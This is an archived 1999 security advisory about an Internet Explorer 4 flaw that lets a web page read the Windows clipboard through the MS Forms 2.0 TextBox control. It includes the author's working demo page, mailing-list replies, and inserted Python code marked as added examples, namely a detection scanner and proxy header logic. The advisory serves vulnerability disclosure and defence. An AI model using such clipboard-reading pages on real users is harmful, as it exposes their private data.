cuartangojc-clipboard-msie.txt

Posted Aug 17, 1999
Authored by Juan Carlos Garcia Cuartango

MSIE 4 Privacy Issue: clipboard content can be made public by a javascript code two lines long. Exploit code included.

tags | exploit, javascript
SHA-256 | 533480375e13300a1ea411f4dea31920cc0d84718326039eb9f44a2afd0493a2

Date: Thu, 21 Jan 1999 15:59:15 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: New IE4 privacy issue

Greetings,

There is a new IE 4 issue affecting privacy. The clipboard content can be made public by JavaScript code two lines long.
I reported the problem to Microsoft on Jan 7 and they have posted the corresponding security bulletin and a fix today, 21 January.
Although the vulnerability can be exploited from the IE 4 navigator it is not an IE 4 bug. The problem is located in some ActiveX controls called "MS Forms 2.0"
that are shipped and installed with the following applications:

Microsoft Office 97
Microsoft Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0
Other non-MS applications based on VB or VBA

More info and a demo are available at:
http://pages.whowhere.com/computers/cuartangojc
The Microsoft security bulletin is:
http://www.microsoft.com/security/bulletins/ms99-001.asp

Regards,

Juan Carlos

----------[ http://pages.whowhere.com/computers/cuartangojc/ ]----------

The Clipboard vulnerability

Internet Explorer 4
Only if you also have installed one of the following applications:
Microsoft Office 97
Microsoft Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0

Reported to MS Jan 7 1999
Confirmed and fixed Jan 21 1999.
http://www.microsoft.com/security/bulletins/ms99-001.asp
MS Security Bulletin ms99-001

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>The Clipboard vulnerability demo</title>
</head>

<body onload="GetClipBoard()">
<script>
function GetClipBoard()
{
tb.paste(); // paste over the Microsoft Forms 2.0 TextBox
document.forms(0).S1.value=tb.text; // moves the text to the text area box
if(document.forms(0).S1.value == "")
alert("Your browser does not have the security hole or your clipboard was empty ");
else
alert("Clipboard security hole in browser -- " + navigator.userAgent );
}
</script>


<h1 align="center"><font color="#FF0000"><small>T<strong>he Clipboard Vulnerability Demo</strong></small></font></h1>

<p align="left"><font face="Arial"><small>According to Microsoft security rules, access
to Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If a script performs a
"paste" operation over an input text box the operation will succeed only if data
were copied to the clipboard from the Internet Explorer. </small></font></p>

<p align="left"><small><font face="Arial">There is a way to circumvent this protection by
using a Microsoft Forms 2.0 TextBox ActiveX object. This TextBox object can perform a
"paste" operation without security restrictions. The clipboard data can then be
transferred to a form input box and posted to a malicious web site. The vulnerability can also
be exploited from an e-mail message.</font></small></p>

<p align="left"><small><font face="Arial">This control does not ship with Windows or with
Internet Explorer, but rather people get it by installing Office 97, Visual Basic 5.0, or
a couple of other applications, although the exposure for most users would be through
Internet Explorer.</font></small></p>

<p align="left"><strong><small><font face="Arial">The box below&nbsp;is an Input Text Area
Box; your clipboard text data must be here. If not, do a copy (from any application)
&nbsp;and reload this page. If this box shows your clipboard content then you are
affected.</font></small></strong></p>

<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan -->
<div align="center"><center><p><textarea rows="3" name="S1" cols="82"></textarea></p>
</center></div>
</form>

<p align="center"><small><font face="Arial"><strong>The box below (blue) is a Microsoft
Forms 2.0 TextBox ActiveX object, it will also show the clipboard content.</strong></font></small><br>
<br>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"
height="23">
<param name="VariousPropertyBits" value="2894088219">
<param name="BackColor" value="16776960">
<param name="Size" value="4480;600">
<param name="FontHeight" value="200">
<param name="FontCharSet" value="0">
<param name="FontPitchAndFamily" value="2">
</object>
</p>
<div align="center"><center>

<table border="0">
<tr>
<td style="border: 1px solid"><p align="left"><font face="Arial"><strong><small>The script
making public the clipboard is very simple :</small></strong><br>
</font><font COLOR="#000000" face="Courier New" size="2"><br>
function GetClipBoard()<br>
{<br>
tb.paste();
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;// paste over the MS Forms 2.0 TextBox <br>
document.forms(0).S1.value=tb.text;&nbsp;&nbsp;// moves the text to the text area box<br>
}</font></td>
</tr>
</table>
</center></div>

<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More
BUGS)</strong></font></a></p>

<p align="center"><font color="#FF0000">Created by</font> <a href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos Garcia Cuartango</a> </p>

</body>
</html>
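The demo page above pairs two things a defender can key on in HTML or HTML e-mail: an <object> that instantiates the Microsoft Forms 2.0 TextBox control (the CLSID in the demo's object tag) and a script that calls .paste on that object's id. The following scanner, added here as an example and not part of the advisory or of Cuartango's demo page, flags exactly that combination and leaves a page that merely embeds the control alone. The sample documents, the function names and the form action URL in them are constructed for the example; the CLSID is the one from the demo.

```python
import re

# Added example (Python), not from the advisory or its demo page. It scans
# HTML/e-mail bodies for the pattern the demo relies on: an <object> embedding
# the Microsoft Forms 2.0 TextBox control (CLSID taken from the demo's object
# tag) whose script then calls .paste on it. Sample documents and function
# names below are constructed for this example.

MSFORMS_TEXTBOX_CLSID = "8bd21d10-ec42-11ce-9e0d-00aa006002f3"

OBJECT_TAG_RE = re.compile(r"<object\b([^>]*)>", re.I | re.S)
# Unquoted, single- or double-quoted attribute values; only 'id' and 'classid'.
ATTR_RE = re.compile(r"""\b(id|classid)\s*=\s*["']?([^"'\s>]+)""", re.I)


def find_msforms_textboxes(html):
    """Element ids of every <object> that instantiates the MS Forms 2.0 TextBox."""
    ids = []
    for tag in OBJECT_TAG_RE.finditer(html):
        attrs = {name.lower(): value for name, value in ATTR_RE.findall(tag.group(1))}
        clsid = attrs.get("classid", "").lower()
        if clsid.startswith("clsid:"):
            clsid = clsid[len("clsid:"):]
        if clsid.strip("{}") == MSFORMS_TEXTBOX_CLSID and "id" in attrs:
            ids.append(attrs["id"])
    return ids


def paste_targets(html, ids):
    """Ids from `ids` on which any script in the document calls .paste.
    The parenthesis is not required, so the VBScript form (tb.Paste) is caught too."""
    hits = []
    for obj_id in ids:
        pattern = re.compile(r"\b%s\s*\.\s*paste\b" % re.escape(obj_id), re.I)
        if pattern.search(html):
            hits.append(obj_id)
    return hits


def scan(html):
    """Summarise a document: which TextBox objects exist and which are pasted into."""
    ids = find_msforms_textboxes(html)
    pasted = paste_targets(html, ids)
    return {"textbox_ids": ids, "pasted_ids": pasted, "suspicious": bool(pasted)}


# Constructed samples. DEMO_LIKE mirrors the shape of the demo page; BENIGN
# embeds the same control (as a legitimate form might) but never pastes into it.
DEMO_LIKE = """<html><body onload="GetClipBoard()">
<script>
function GetClipBoard() {
  tb.paste();
  document.forms(0).S1.value = tb.text;
}
</script>
<form method="POST" action="http://example.invalid/collect"><textarea name="S1"></textarea></form>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169" height="23"></object>
</body></html>"""

BENIGN = """<html><body>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3"></object>
<script>tb.text = "type here";</script>
</body></html>"""

if __name__ == "__main__":
    for label, doc in (("demo-like", DEMO_LIKE), ("benign", BENIGN)):
        print(label, scan(doc))
```

The check is deliberately narrow: it reports only when a script addresses a TextBox object by its id and invokes paste, which is the step that actually crosses the clipboard boundary; embedding the control by itself is what a legitimate Office-generated page does. Running it over mail bodies as well as pages covers the e-mail vector the demo text mentions.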

-----------------------------------------------------------------------------------

Date: Mon, 25 Jan 1999 06:45:37 +0100
From: Drazen Kacar <dave@SRCE.HR>
To: BUGTRAQ@netspace.org
Subject: Re: IE4 Persistent Connection Bug

Joel Moses wrote:
> The document below details a connection-reuse problem which uses
> persistent connections even when they have either 1) been specifically
> disabled, or 2) have been told to close by a server "Connection:
> close".

[...]
> ------------------------------------------------------------------
> $ nc -p 9000 -l
> GET http://www.somesite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.somesite.com
> Proxy-Connection: Keep-Alive
>
> "HTTP/1.1 200 OK"
> "Connection: close"
> "Content-Length: 5"
>
> "abcde"
> ------------------------------------------------------------------
>
> The browser will display "abcde," and the IE logo will stop
> circulating. However, the connection will not -- as requested by the
> server -- close. If you issue another page request in the browser for

You mean "as requested by the origin server." The Connection header is hop-by-hop,
which means that it has a meaning for the connection between origin server
and proxy server only. The proxy server doesn't have to propagate it to the
user agent. And there is a Proxy-Connection header in the request.
I don't know where that one is defined (it isn't in RFC 1945, nor in RFC 2068,
nor in the latest HTTP/1.1 draft), but I would assume it has something to do
with open connections between the user agent and proxy server.

> a different site, the request will come through on this
> previously-opened connection, e.g.,:
>
> ------------------------------------------------------------------
> GET http://www.othersite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.othersite.com
> Proxy-Connection: Keep-Alive
> ------------------------------------------------------------------
>
> This clearly violates HTTP/1.0 behavior, with which the browser
> reports to the server that it complies.

It doesn't. Your netcat "proxy" violates it. Here's a quote from RFC 1945:

Except for experimental applications, current practice requires that
the connection be established by the client prior to each request and
closed by the server after sending the response.

> Netscape 4.x behaves correctly and closes the connection itself when
> faced with the same situation.

See above. The server is responsible for closing the connection. Server
here means either origin server or proxy server, whichever happens to be
connected to user agent.

--
.-. .-. Life is a sexually transmitted disease.
(_ \ / _)
| dave@srce.hr
| dave@fly.cc.fer.hr
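The reply above makes two points that are easy to get wrong when writing or testing a proxy: Connection is hop-by-hop and must not be forwarded as-is, and under RFC 1945 the side that talks to the user agent is the one that closes the connection after the response. The code below, added here as an example and not part of either post, encodes both rules and applies them to the captured exchange from the report (re-typed as constructed sample input). The hop-by-hop set is the one RFC 2068 names; treating Proxy-Connection as hop-by-hop as well is an assumption made here, since, as the reply notes, no RFC defines it. Function names are the example's own.

```python
# Added example (Python), not from either post. Connection-lifetime and
# hop-by-hop rules as a proxy should apply them, run over the captured exchange.
#   RFC 1945 (HTTP/1.0): the server closes after the response by default;
#   persistence is a non-standard extension both sides must ask for.
#   RFC 2068 names Connection, Keep-Alive, Public, Proxy-Authenticate,
#   Transfer-Encoding and Upgrade as hop-by-hop.
# Assumption: Proxy-Connection is treated as hop-by-hop too (no RFC defines it).

HOP_BY_HOP = {"connection", "keep-alive", "public", "proxy-authenticate",
              "transfer-encoding", "upgrade", "proxy-connection"}


def parse_message(raw):
    """Split a raw request or response into (start_line, [(name, value), ...]).
    Header names are lower-cased; RFC 822 style folded lines are joined."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head = raw.split(sep, 1)[0]
    lines = head.replace("\r\n", "\n").split("\n")
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        if line[0] in " \t" and headers:          # continuation of previous header
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def header_tokens(headers, name):
    """Comma-separated tokens of every header with this name, lower-cased."""
    out = []
    for n, v in headers:
        if n == name:
            out.extend(t.strip().lower() for t in v.split(",") if t.strip())
    return out


def server_should_close(request_raw, response_raw):
    """Must the side talking to the user agent close after this response?"""
    req_line, req_h = parse_message(request_raw)
    _, resp_h = parse_message(response_raw)
    version = req_line.split()[-1].upper()
    if "close" in header_tokens(resp_h, "connection"):
        return True
    if version == "HTTP/1.0":
        # Default is close; stay open only if the client asked for keep-alive
        # (directly or, through a proxy, via Proxy-Connection) and the server agreed.
        asked = "keep-alive" in (header_tokens(req_h, "connection")
                                 + header_tokens(req_h, "proxy-connection"))
        agreed = "keep-alive" in header_tokens(resp_h, "connection")
        return not (asked and agreed)
    return False  # HTTP/1.1 connections persist unless told otherwise


def strip_hop_by_hop(headers):
    """Headers a proxy may forward: drop the fixed set plus names listed in Connection."""
    listed = set(header_tokens(headers, "connection"))
    return [(n, v) for n, v in headers if n not in HOP_BY_HOP and n not in listed]


# Constructed sample input, re-typed from the exchange in the report.
REQUEST = (
    "GET http://www.somesite.com/ HTTP/1.0\r\n"
    "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,\r\n"
    " application/vnd.ms-excel, application/msword,\r\n"
    " application/vnd.ms-powerpoint, */*\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)\r\n"
    "Host: www.somesite.com\r\n"
    "Proxy-Connection: Keep-Alive\r\n"
    "\r\n")
RESPONSE = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 5\r\n\r\nabcde"

if __name__ == "__main__":
    print("close after response:", server_should_close(REQUEST, RESPONSE))
    print("forwardable headers:", strip_hop_by_hop(parse_message(REQUEST)[1]))
```

With the captured exchange the answer is "close", and it would still be "close" if the response carried no Connection header at all, because the request is HTTP/1.0 and nothing in the response agreed to keep-alive; the only way this HTTP/1.0 exchange stays open is a Keep-Alive answer from whichever server sits on the user agent's connection.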

-----------------------------------------------------------------------------------

Date: Mon, 25 Jan 1999 15:14:15 -0000
From: Eamonn Turley <ETurley@ALBAN.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: New IE4 privacy issue

Not just Javascript code.
VB Script, as well.

Anything that can use ActiveX controls, can do it.
This is all of Office, Internet Explorer, Visual Studio (VB, C++ etc.),
Netscape Navigator (I believe) and I believe AutoCAD uses VBScript, so
may be able to do this.
